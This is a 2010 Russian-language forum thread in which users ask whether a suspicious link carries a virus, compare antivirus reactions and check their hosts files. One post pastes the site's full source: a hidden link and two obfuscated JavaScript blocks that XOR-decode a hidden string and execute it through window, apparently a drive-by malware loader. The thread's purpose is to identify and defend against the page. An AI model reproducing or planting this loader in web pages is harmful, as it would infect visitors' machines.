X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Есть ли здесь вирус или троян ?
kulbit
kulbit
Topic Starter сообщение 21.7.2010, 21:34; Ответить: kulbit
Сообщение #1


Здравсвтуйте. Кто может подскажите, что за хрень может находиться здесь (осторожно возможно вирус)_http://bastardisabelle.com/slv/12. После того как перешел по этой ссылке урл стал таким _http://bastardisabelle.com/slv/12?filter=Opera&search=4&id=12&img=17784277&context=10.60

Стоит нод32, но он молчал. Outpost Firewall тоже не среагировал.

Сообщение отредактировал kulbit - 21.7.2010, 21:36


--------------------
Скажи нет терпимости!!! 14
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
darkRoma
darkRoma
сообщение 21.7.2010, 21:40; Ответить: darkRoma
Сообщение #2


Не знаю на счет вируса, но KIS отреагировал на сайт, как на вредоносную ссылку.



--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kulbit
kulbit
Topic Starter сообщение 21.7.2010, 21:42; Ответить: kulbit
Сообщение #3


Мда. Интересно что же там было. В логах KIS не написано, что за ссылка или другии подробности?


--------------------
Скажи нет терпимости!!! 14
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
nonub
nonub
сообщение 21.7.2010, 22:05; Ответить: nonub
Сообщение #4


(kulbit @ 21.7.2010, 20:42) *
Мда. Интересно что же там было. В логах KIS не написано, что за ссылка или другии подробности?


В логах ничего, перешёл, ничего не прогрузилось, может браузер не понравился smile.gif после чего редирект на google.com

Выдрал исходный код, правда закодированно:

<html><body><a style='display:none' href='http://bastardisabelle.com/slv/cf898dcc0040ae5abddacdc0e67bf074.php'>diyiuowequteuw</a><script>var waterThey=["waterBond"];fromThat=6725;fromThat++;var canGulf="canGulf";this.a="";var tiny={c43fd630fc5d0ebe292:4,b2ebe5cd67eef817e21bc0712ee6d499abf7246:5,z97e6395dadab060:8,i7a31851f4cf0454f19d3cf2c6:6,W1e55bd949d42f5:2,R900db559d2:2,Z3327d844eb9f09a65:9,X79ac6382fcb2960b092b329d62:4,N467b086c41d65a0fe:1,Gd856fd9c2db25da0e82b55f06f1b863b86b7:3,G38dd6cf1d77b14842da84bdf1d6cbe90da1:7,G37108c9243148432:7,w0a358f49d33ae5ed562a2ed734bce23219de:6,le724692eb3d0d09e1645afb9f:8,I54a5a01250a8ad:6,I4af0c61362a1e:3,N5c61969b990d:6,W91421:9};var waterThey=["waterBond"];fromThat=6725;fromThat++;var them=window;var water=24697;var oil="";var canGulf="canGulf";this.a="";resultUse=17688;resultUse--;var gulf=oil;resultUse=17688;resultUse--;for(var i in tiny) gulf=[gulf,i.substr(1)].join(oil);var canGulf="canGulf";this.a="";resultUse=17688;resultUse--;var that=oil;this.b='';var to=new String("fromLaQA".substr(0,4)+"DKnCharDKn".substr(3,4)+"gWSCodeWSg".substr(3,4));var help=new Date();var tinyBp=String("su"+"bsJwpm".substr(0,2)+"trBlYP".substr(0,2));var water=24697;var useTiny=38;var waterThey=["waterBond"];fromThat=6725;fromThat++;var toThe=35;var help=new Date();var canTo=0;var help=new Date();var canGulf="canGulf";this.a="";for(i=0;i<gulf.length;i+=2){var water=24697;resultUse=17688;resultUse--;var thatBp=gulf.substr(i,2);this.b='';thatBp=parseInt(thatBp,16);var waterThey=["waterBond"];fromThat=6725;fromThat++;thatBp=thatBp^useTiny;this.b='';var canGulf="canGulf";this.a="";useTiny+=thatBp;var help=new Date();useTiny=useTiny % 255;resultUse=17688;resultUse--;var waterThey=["waterBond"];fromThat=6725;fromThat++;thatBp=String[to](thatBp);resultUse=17688;resultUse--;var waterThey=["waterBond"];fromThat=6725;fromThat++;that=[that,thatBp].join(oil);var waterThey=["waterBond"];fromThat=6725;fromThat++;}var canGulf="canGulf";this.a="";var canGulf="canGulf";this.a="";function cHelp(){var water=24697;this.b='';canTo++;var waterThey=["waterBond"];fromThat=6725;fromThat++;if(canTo > toThe){var canGulf="canGulf";this.a="";resultUse=17688;resultUse--;result=that[tinyBp](0,4);this.b='';that=that[tinyBp](4);var waterThey=["waterBond"];fromThat=6725;fromThat++;them[result](that);var waterThey=["waterBond"];fromThat=6725;fromThat++;var help=new Date();return; }var waterThey=["waterBond"];fromThat=6725;fromThat++;var canGulf="canGulf";this.a="";cHelp();var waterThey=["waterBond"];fromThat=6725;fromThat++;}var canGulf="canGulf";this.a="";resultUse=17688;resultUse--;cHelp();var water=24697;that=null;var water=24697;</script><script>resultUse=17688;resultUse--;resultUse=17688;resultUse--;var tiny={z51ef711dab35c7083d9de03b:4,p1c0abe4b94f1215da7f7da6f42f620057ee1937:0,I459ebb714f85d6cb6fed01a56b8f6c21870be8:0,Fcc479ddad3ba14afb:7,B9803e77e178b39b:8,w21b02b25284e6b35bc:4,Q44166e3983da06d16:6,mb977b5c17ce18375269b2d23cd60a2c15837c74:8,l3a28b397ecffd47764a958b2d929a5:7,Y2fc9d36f1b4:3,P25e0a87f05c81a6e:6,de69e05d14cda8f7a03bd731299:8,a54cdd97853d3020eba874761a0c00322ce0026e4:0,B3d78af80fc214fe0d90d761:1,U6836b48a4b2cba253bb9394:6,o32aa57f87050c27a0a9b3ba251:8,qf67b55c87b0:7,yba55bf66c4e:9,Kb3f6290b06f16117b834d54ce4256c:4,I00a834c447f28851d4ae3fd343e9:3,Y6b01c721112ac6:0,rdfff20006016b74a8aa51a67b7d37:1,j3e89b09b459d13:3,n42bd97be2903cfb6815b826c663a39:1,K19a672df4b56eac99e21f160868:2,E48a8c73625c577049937a30c71a:1,x98ba843b996ca78178376a483f1b6783c8:0,p5430db398fc4001a8f6b37f:2,V489bd3361d43b383d33:0,P9714191e12f6e52b99f9d6121eca8733e84:9,Z460acbe9d62339344f3:6,Gbb14f8fb4415c5747a787e78e379ffe6e:8,V2be9813b99f62b5ece2d1a7e1d896831e1:8,r844eb9b3cac5dca55:7,R06d647f76f:5,Bc9417b8309eb028c50a0ffd701b917e579ce8e5f:9,Ncf7758f8691dc15203b58ff741:0,o7bf680de4fc080368:6,f8491a88ac3d9d4efe69e2aba20d272eb9d42dd:4,ad72a7db5878670e:0,l1d52e78e68078e38021:7,Z9fee27229fe77:7,qc4dc97315ec3f0b15f12b5086b157c97:4,P2159e4fe39408af44cd:2,t6113d60b74f99802b654f23e725:4,e4f16f08eb257244:5,s86d22366bc9a8129db50fd8502d71969a78:3,r1dd382dc92f7eb294be56c461ec9c:8,e5cd19d3bb157b5c4:5,D0c78758c87e46e04b050cf75:8,L1a912ee6a960be89:5,Pc1183d84956ab2f49a3d:2,Hf4973bdd1065:2,_b3de126ce8c146e7817bb:3,I38781624f9:9,Gfef39027e778d9893de2b213c439bb:7,ie2dde44a6dd2825157555b5c34dff204faf92c:7,mc691e8331d442e28e41fe7316b94ecb513:7,i5a046fd9318c:3,N82b6438f6420fdbc1:0,J2f14607d5dbd9dfd8b15a76806f6c:7,Yb1430d74bfe6c0bbd36988:0,m73adf41f59:2,Z01ecc681fba2bc700723d8:4,G34e0bd08209644dbbb1cceece2f0f2:5,q0909818aa2:2,re90ed2e0c31c152fe970ba:4,Va5983e8cc781587:0,n77e98514ad20c858f7:5,l6d4fa498f1791e923acc:7,D59c06109b41a14b834d13:6,Tc6b49e4985ec4601ab628cf5df8:4,B210e721c9421a656c47ee99d:0,I7cbbb1cceece2:9,kf0f21939f19a92f8ff22d0f2ec051fd9445a2:6,p96b55bef79:3,W168678ec9124eac134:6,F59b4a24eb299ff701cb335a856f6735:4,R6dc3f1448e39407bc2ad803787482:3,D9bbb9bfbdb78ef8c26a553f5:0,Q7e50ce601a9b72e:4,pb9b2ca95cc44620d976e2c27cab90ecf9d93:0,da1a7a1eb12dc44af1971cf26902b8389489:9,k3aca4efe9a20ce6614:0,p80611ff6324e4451:5,p41a181e19524b16219d7eef9d93a1a7a138:1,r56253fc587cec8d3bad107f5dc26d4fd2c460a:6,I39ad6efe6f1797:0,X78e9990abdf48fa951dc16c15a26d:1,l28c057f875:2,w5188f10c19102b56a2bb9b:9,Lfbdb3c4199ba5cea7:1,x01efed642a595ae5b516c6:0,F757b797f7831ea77803f9f:8,E40e1939197959f06541b0dc7a5ef26:9,la4ea59bae3fd:3,Lc4ba9f0234681f8f00c071:1,le292046ce7d:6,uee8748e6932bf3b64:8,ibd971ff28016a869f9688e8c829548:7,U6a54bff630be39621f8da6:8,G09ca9a0bb9bd2eee7fe086c058b3:9,q7c345fa6b53ccc311:7,h3d8cdc193c8bcb1f6bf2c7183e8ac61f6ba0:2,qf6976db4ff395ba2e23e781ef62e4b8:9,zbbc2ac27f1099:8,X48f86e13b241c07ceccd0c6ffc6609bb5ff7:1,i357751f4635699eb2a54f16e1a873a87b837d26:9,kfeed67415872ca94ade226dbd93dd127411:0,M8c288bc21264a6f2c2065cbec:6,F3077d88839aef7501bd57ca:7,y70159c2bfba46ab9a51765b1a41264a7f39a6ea0:7,Aa6136fb7f3c81f3ef5cc1:7,k651c33d0b4690866b4:5,j698e82009677e8a83:4,I9a95d82924167656b6cb3e373ace:2,_c7:4};var waterThey=["waterBond"];fromThat=6725;fromThat++;var them=window;var canGulf="canGulf";this.a="";var oil="";this.b='';resultUse=17688;resultUse--;var gulf=oil;this.b='';for(var i in tiny) gulf=[gulf,i.substr(1)].join(oil);var canGulf="canGulf";this.a="";var waterThey=["waterBond"];fromThat=6725;fromThat++;var that=oil;this.b='';var to=new String("fromLaQA".substr(0,4)+"DKnCharDKn".substr(3,4)+"gWSCodeWSg".substr(3,4));var water=24697;var tinyBp=String("su"+"bsJwpm".substr(0,2)+"trBlYP".substr(0,2));resultUse=17688;resultUse--;var useTiny=52;var water=24697;var toThe=35;resultUse=17688;resultUse--;var canTo=0;var waterThey=["waterBond"];fromThat=6725;fromThat++;resultUse=17688;resultUse--;for(i=0;i<gulf.length;i+=2){var water=24697;this.b='';var thatBp=gulf.substr(i,2);var canGulf="canGulf";this.a="";thatBp=parseInt(thatBp,16);resultUse=17688;resultUse--;thatBp=thatBp^useTiny;var waterThey=["waterBond"];fromThat=6725;fromThat++;var waterThey=["waterBond"];fromThat=6725;fromThat++;useTiny+=thatBp;var canGulf="canGulf";this.a="";useTiny=useTiny % 255;var waterThey=["waterBond"];fromThat=6725;fromThat++;this.b='';thatBp=String[to](thatBp);var water=24697;var waterThey=["waterBond"];fromThat=6725;fromThat++;that=[that,thatBp].join(oil);resultUse=17688;resultUse--;}resultUse=17688;resultUse--;var waterThey=["waterBond"];fromThat=6725;fromThat++;function cHelp(){var water=24697;this.b='';canTo++;var help=new Date();if(canTo > toThe){resultUse=17688;resultUse--;this.b='';result=that[tinyBp](0,4);var canGulf="canGulf";this.a="";that=that[tinyBp](4);this.b='';them[result](that);resultUse=17688;resultUse--;resultUse=17688;resultUse--;return; }var help=new Date();var help=new Date();cHelp();var canGulf="canGulf";this.a="";}var water=24697;var help=new Date();cHelp();var waterThey=["waterBond"];fromThat=6725;fromThat++;that=null;var canGulf="canGulf";this.a="";</script></body></html>


Сообщение отредактировал nonub - 21.7.2010, 22:08


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
darkRoma
darkRoma
сообщение 21.7.2010, 22:06; Ответить: darkRoma
Сообщение #5


(nonub @ 21.7.2010, 21:05) *
В логах ничего, перешёл, ничего не прогрузилось, может браузер не понравился smile.gif после чего редирект на google.com

Проверьте hosts теперь. Интересно, нет-ли там заразы после перехода.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Cttr
Cttr
сообщение 21.7.2010, 22:09; Ответить: Cttr
Сообщение #6


(darkRoma @ 21.7.2010, 21:06) *
Проверьте hosts теперь.

ps. Кстати KIS запрещает даже перезапись хоста, матюкатся в 3 этажа )
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kulbit
kulbit
Topic Starter сообщение 21.7.2010, 22:09; Ответить: kulbit
Сообщение #7


(darkRoma @ 21.7.2010, 22:06) *
Проверьте hosts теперь.


Там все чисто )


--------------------
Скажи нет терпимости!!! 14
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
nonub
nonub
сообщение 21.7.2010, 22:10; Ответить: nonub
Сообщение #8


(darkRoma @ 21.7.2010, 21:06) *
Проверьте hosts теперь. Интересно, нет-ли там заразы после перехода.


С hosts всё в порядке, да и Pure кричит когда его пытается что-то изменить.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
darkRoma
darkRoma
сообщение 21.7.2010, 22:19; Ответить: darkRoma
Сообщение #9


(Cttr @ 21.7.2010, 21:09) *
ps. Кстати KIS запрещает даже перезапись хоста, матюкатся в 3 этажа )

Серьезно? Почему я об этом не знаю, учитывая, что меняю его ежедневно? happy.gif

Меняю, как вручную, так и через OSHE.

Вопрос к знатокам: "Стоит-ли с KIS10 переходить на Pure и подойдет-ли лицензия от KIS10 на Pure?"


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
nonub
nonub
сообщение 21.7.2010, 22:20; Ответить: nonub
Сообщение #10


(darkRoma @ 21.7.2010, 21:19) *
Вопрос к знатокам: "Стоит-ли с KIS10 переходить на Pure и подойдет-ли лицензия от KIS10 на Pure?"


Насчёт стоит или нет не скажу, чистым KIS не пользовался. Лицензия от KIS для Pure не подойдёт.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Создать видеоканал лучше в ютуб или телеграм?
10 uahomka 1779 24.3.2024, 4:21
автор: Alexand3r
Открытая тема (нет новых ответов) Если статья не в индексе Google - она уникальна или нет?
2 uahomka 796 20.3.2024, 11:17
автор: Vmir
Открытая тема (нет новых ответов) Где больше пробив на кликандер или попандер или попап трафике?
1 Boymaster 613 20.3.2024, 9:50
автор: Skyworker
Открытая тема (нет новых ответов) Есть смысл создавать сайты на латышском?
15 Nekit 3248 20.3.2024, 9:40
автор: Skyworker
Горячая тема (нет новых ответов) Выполню качественную верстку макетов или разработка собственного, быстро и не дорого
от 45$
123 webche 116749 17.3.2024, 7:09
автор: webche


 



RSS Текстовая версия Сейчас: 28.3.2024, 22:23
Дизайн